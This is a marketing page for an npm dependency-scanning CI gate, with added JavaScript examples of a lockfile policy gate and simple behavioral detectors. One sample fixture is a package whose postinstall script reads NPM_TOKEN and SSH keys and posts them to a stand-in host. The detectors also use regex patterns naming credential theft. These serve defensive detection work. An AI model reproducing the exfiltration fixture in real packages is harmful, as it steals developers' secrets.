Behavioral Supply Chain Intelligence
Get visibility into dependency behavior in your CI pipeline. Every package change gets a risk score and behavioral report — flag suspicious packages for review, auto-approve the rest. Configurable thresholds, allowlists, and a full audit trail for compliance.
No credit card required. Free forever.
Why You Need an Intake Gate
In 2025, these unreviewed dependency updates hit production.
None had a CVE at the time they merged. No intake process caught them. They merged through standard PR workflows.
- chalk + debug hijack: packages with 2.6B combined weekly downloads compromised
- Shai-Hulud worm: 500+ packages infected in 24 hours
- S1ngularity campaign: 2,349 credentials stolen via install scripts
- tj-actions breach: 23K repos exposed; the campaign initially targeted Coinbase
Without an intake gate:
- Dependencies merge unreviewed
- CVE tools miss attacks that have no CVE yet
- No policy enforcement on upgrades
- No audit trail for compliance
With an intake gate:
- Every upgrade gets a verdict before merge
- Behavioral analysis catches new attacks
- Configurable pass/warn/block thresholds
- Full scan history and audit trail
Set thresholds, allowlist trusted packages, choose warn vs. block per repository. Your governance rules, automated.
Every lockfile change gets a verdict posted as a PR comment. Review flagged packages before they merge.
One YAML file or npm i -g @westbayberry/dg. Works with GitHub Actions, GitLab CI, Jenkins, and more.
Every scan logged with verdicts, risk scores, and findings. Built for teams that need to prove what was reviewed.
Detection accuracy validated against 11,000+ real packages (99.95% precision, 99.7% F1). See benchmarks.
How it works
From dependency change to approved merge in four steps.
Pull Request
A developer opens a PR that adds or updates npm packages in your lockfile.
Scan for Attacks
26 behavioral detectors analyze every file in each package for malicious code patterns.
Pass / Warn / Block
A risk score determines the verdict: safe to merge, review needed, or blocked outright.
Ship Safe
Merge with confidence knowing every dependency change was analyzed before reaching main.
GitHub Actions
PR #247 bump lodash 4.17.20 → 4.17.21
→ Scanning 3 changed packages...
→ Running 26 detectors across 847 files
→ PASS — safe to merge
CLI
$ dg scan
Discovering package changes...
Scanning 3 packages (git-diff)...
Dependency Guardian Score: 0 PASS
3 packages scanned, 0 flagged
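The four steps above, as an added JavaScript example. This is not Dependency Guardian's code: it shows the shape of an intake gate (diff two npm lockfiles, look up a risk score per changed package, apply a per-repository policy with warn/block thresholds, an allowlist and a warn-vs-block mode, and render the PR comment). The policy field names, the threshold values, and the `scores` table keyed `name@version` are assumptions made for the example; a real gate would compute those scores with detectors. The lockfiles and scores are constructed sample data.

```javascript
// Added example, not Dependency Guardian's own code. A minimal intake gate:
// diff two npm lockfiles (v2/v3 "packages" map), score each changed package,
// apply a per-repo policy, and produce a PASS / WARN / BLOCK verdict.
// Risk scores come from a hypothetical `scores` table supplied by the caller.

const DEFAULT_POLICY = {
  warnAt: 30,     // score >= warnAt  -> WARN (human review before merge)
  blockAt: 60,    // score >= blockAt -> BLOCK (merge prevented)
  mode: "block",  // "block" fails the check; "warn" only flags for review
  allowlist: [],  // package names exempt from scoring (trusted vendors)
};

// Package name from a lockfile install path; handles scopes and nesting:
// "node_modules/a/node_modules/@s/b" -> "@s/b"
function packageName(installPath) {
  const marker = "node_modules/";
  return installPath.slice(installPath.lastIndexOf(marker) + marker.length);
}

// Added and updated entries between two lockfiles. Removals cannot introduce
// new code into the tree, so they are not scored here.
function changedPackages(before, after) {
  const prev = before.packages || {};
  const changes = [];
  for (const [path, meta] of Object.entries(after.packages || {})) {
    if (path === "") continue; // "" is the root project, not a dependency
    const old = prev[path];
    if (!old) {
      changes.push({ name: packageName(path), from: null, to: meta.version, kind: "added" });
    } else if (old.version !== meta.version) {
      changes.push({ name: packageName(path), from: old.version, to: meta.version, kind: "updated" });
    }
  }
  return changes;
}

function verdictForScore(score, policy) {
  if (score === null) return "WARN"; // never analyzed: fail closed to human review
  if (score >= policy.blockAt) return "BLOCK";
  if (score >= policy.warnAt) return "WARN";
  return "PASS";
}

const RANK = { PASS: 0, WARN: 1, BLOCK: 2 };

function evaluate(before, after, scores, policy = DEFAULT_POLICY) {
  const packages = changedPackages(before, after).map((c) => {
    const allowlisted = policy.allowlist.includes(c.name);
    const score = allowlisted ? 0 : (scores[`${c.name}@${c.to}`] ?? null);
    let verdict = verdictForScore(score, policy);
    if (verdict === "BLOCK" && policy.mode === "warn") verdict = "WARN"; // warn mode never fails CI
    return { ...c, score, allowlisted, verdict };
  });
  const verdict = packages.reduce((worst, p) => (RANK[p.verdict] > RANK[worst] ? p.verdict : worst), "PASS");
  const maxScore = Math.max(0, ...packages.map((p) => p.score ?? 0));
  // exitCode is what a CI step would return: only BLOCK fails the check
  return { verdict, maxScore, packages, exitCode: verdict === "BLOCK" ? 1 : 0 };
}

// Markdown body for the PR comment, one row per changed package.
function formatComment(result) {
  const rows = result.packages.map((p) =>
    `| ${p.name} | ${p.from ?? "(new)"} -> ${p.to} | ${p.score ?? "unscored"} | ${p.verdict}${p.allowlisted ? " (allowlisted)" : ""} |`);
  return [`**Dependency gate: ${result.verdict}** (max score ${result.maxScore})`, "",
    "| package | change | score | verdict |", "|---|---|---|---|", ...rows].join("\n");
}

// --- constructed sample input (not real lockfiles, not real scores) ---
const beforeLock = { lockfileVersion: 3, packages: {
  "": { name: "app" },
  "node_modules/lodash": { version: "4.17.20" },
  "node_modules/debug": { version: "4.3.4" },
} };
const afterLock = { lockfileVersion: 3, packages: {
  "": { name: "app" },
  "node_modules/lodash": { version: "4.17.21" },
  "node_modules/debug": { version: "4.3.4" },
  "node_modules/@types/node": { version: "20.11.0" },
  "node_modules/some-new-helper": { version: "1.0.3" }, // hypothetical new package
} };
const sampleScores = { "lodash@4.17.21": 4, "some-new-helper@1.0.3": 82 }; // hypothetical
const repoPolicy = { ...DEFAULT_POLICY, allowlist: ["@types/node"] };

const result = evaluate(beforeLock, afterLock, sampleScores, repoPolicy);
console.log(formatComment(result)); // verdict BLOCK: some-new-helper scores 82
```

Run it with `node`. In a CI step, map `result.exitCode` to the process exit status so a BLOCK fails the required check; a package the gate has no score for is treated as WARN rather than PASS, so an analysis outage cannot silently wave changes through.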
In your pull request
Every dependency change gets a verdict posted directly in the PR. Review, approve, or block before merge.
Ship with confidence. Every dependency upgrade is reviewed, scored, and logged before it reaches main.
Built for dependency governance
Six capabilities that turn dependency updates into a controlled process.
CI enforcement on every PR
Runs automatically when package-lock.json changes. One YAML file. Every dependency upgrade goes through your intake gate before it can merge.
Configurable policy engine
Set risk thresholds per repository. Allowlist trusted packages. Choose between warn and block modes. Your governance rules, enforced automatically.
Pass / Warn / Block verdicts
Every PR gets a risk score and a clear verdict. Block mode prevents merging. Warn mode flags for human review. Your team stays in control.
Audit trail and scan history
Every scan is logged with verdicts, risk scores, and findings. Track who approved what, when. Built for compliance reviews and security audits.
Behavioral analysis engine
26 detectors analyze what packages actually do — install scripts, network calls, credential access, obfuscation. Catches zero-day attacks that CVE databases miss.
Your source code stays private
Only npm packages are scanned. Your application code is never uploaded. Self-hosted option available for enterprise environments.
What powers the verdicts
26 behavioral detectors analyze what packages actually do — the engine behind every pass, warn, and block decision.
Install Scripts, Child Process, Network Exfiltration, Obfuscation, Diff Risk, Fresh Publish, Maintainer Change, Sensitive Paths, Binary Addons, Filesystem Persistence, CI Secret Access, Suspicious API, GitHub Reputation, Source Mismatch, Purpose Mismatch, Typosquat, Root Scripts, Behavior Drift, Token Theft, Worm Behavior, Preinstall Timing, Legitimate API Exfil, Bun Runtime Evasion, Dependency Confusion, Browser Phishing, Empty Package
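To make the detector idea concrete, here is an added JavaScript example that is not the project's detector engine. It implements four simplified behavioral checks over a package's files (install-script hooks in package.json, child-process use, credential or env access combined with network calls, and obfuscation signals) and sums their weights into a 0..100 score. The regexes, weights, and the three sample packages are constructed for illustration and are far cruder than what a production engine would use.

```javascript
// Added example, not Dependency Guardian's detectors. Each detector inspects a
// package given as a { "path": "content" } map and returns a finding or null.
// Weights are assumptions chosen so that one signal alone lands in review
// territory and a combination of signals saturates the score.

function grep(files, pattern) {
  return Object.entries(files).filter(([, content]) => pattern.test(content)).map(([path]) => path);
}

const DETECTORS = [
  {
    id: "install-scripts", weight: 35, // lifecycle hooks run arbitrary code on `npm install`
    run(files) {
      const pkg = JSON.parse(files["package.json"] || "{}");
      const hooks = ["preinstall", "install", "postinstall"].filter((h) => pkg.scripts && pkg.scripts[h]);
      return hooks.length ? { detail: hooks.map((h) => `${h}: ${pkg.scripts[h]}`).join("; ") } : null;
    },
  },
  {
    id: "child-process", weight: 20, // spawning shells from library code
    run(files) {
      const hits = grep(files, /\b(child_process|execSync|spawnSync|exec\s*\()/);
      return hits.length ? { detail: hits.join(", ") } : null;
    },
  },
  {
    id: "credential-exfil", weight: 40, // secrets read AND a network sink in the same package
    run(files) {
      const creds = grep(files, /process\.env\.(NPM_TOKEN|GITHUB_TOKEN|AWS_SECRET_ACCESS_KEY)|\.npmrc|\.ssh\//);
      const net = grep(files, /https?\.request\s*\(|fetch\s*\(|require\(['"]axios['"]\)|XMLHttpRequest|net\.connect/);
      return creds.length && net.length ? { detail: `credentials in ${creds}; network in ${net}` } : null;
    },
  },
  {
    id: "obfuscation", weight: 25, // eval/new Function, long hex-escape runs, large base64 blobs
    run(files) {
      const hits = grep(files, /\beval\s*\(|new Function\s*\(|(\\x[0-9a-f]{2}){8,}|[A-Za-z0-9+/]{200,}={0,2}/i);
      return hits.length ? { detail: hits.join(", ") } : null;
    },
  },
];

function analyzePackage(files) {
  const findings = [];
  for (const d of DETECTORS) {
    const hit = d.run(files);
    if (hit) findings.push({ detector: d.id, weight: d.weight, detail: hit.detail });
  }
  const score = Math.min(100, findings.reduce((sum, f) => sum + f.weight, 0));
  return { score, findings };
}

// --- constructed sample packages (hypothetical names and contents) ---
const benignPkg = {
  "package.json": JSON.stringify({ name: "tiny-util", version: "1.0.0", main: "index.js" }),
  "index.js": "module.exports = function pad(s, n) { return String(s).padStart(n); };",
};
// A native addon legitimately needs an install hook; it should score as "review", not "block".
const nativePkg = {
  "package.json": JSON.stringify({ name: "native-addon", version: "2.1.0", scripts: { install: "node-gyp rebuild" } }),
  "index.js": "module.exports = require('./build/Release/addon.node');",
};
const maliciousPkg = {
  "package.json": JSON.stringify({ name: "some-new-helper", version: "1.0.3", scripts: { postinstall: "node setup.js" } }),
  "setup.js": [
    "const { execSync } = require('child_process');",
    "const https = require('https');",
    "const token = process.env.NPM_TOKEN;",
    "const keys = execSync('ls ~/.ssh/').toString();",
    "https.request({ host: 'example.invalid', method: 'POST' }).end(JSON.stringify({ token, keys }));",
    "eval(Buffer.from('" + "QUJD".repeat(60) + "', 'base64').toString());",
  ].join("\n"),
};

for (const pkg of [benignPkg, nativePkg, maliciousPkg]) {
  const { score, findings } = analyzePackage(pkg);
  console.log(JSON.parse(pkg["package.json"]).name, score, findings.map((f) => f.detector));
}
// tiny-util 0 [], native-addon 35 ["install-scripts"], some-new-helper 100 [all four]
```

The native-addon case is the caveat a practitioner should keep in mind: an install hook by itself is how legitimate addons build, so a single detector adds weight rather than deciding the verdict, and the warn/block thresholds plus an allowlist for known build-time packages keep that signal from blocking every `node-gyp` dependency.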
Works everywhere you build
GitHub Actions, GitLab CI, Jenkins, Bitbucket, CircleCI, or your terminal.